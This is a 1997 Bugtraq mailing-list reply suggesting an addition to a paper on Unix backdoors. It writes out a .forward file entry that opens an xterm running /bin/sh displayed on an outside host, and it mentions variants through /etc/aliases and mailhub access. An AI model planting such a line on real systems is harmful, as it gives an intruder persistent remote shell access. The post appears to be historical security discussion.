[5176] in bugtraq
Re: Backdoor Paper
daemon@ATHENA.MIT.EDU (Evil Pete)
Mon Aug 25 14:10:41 1997
Date: Mon, 25 Aug 1997 10:44:34 -0700
Reply-To: shipley@DIS.ORG
From: Evil Pete <shipley@DIS.ORG>
To: BUGTRAQ@NETSPACE.ORG
>Here's a paper I wrote on backdoors. Feedback welcome.
<snip>
you may want to add:
.forward Backdoor
On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).
-Pete
PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
the client and server).
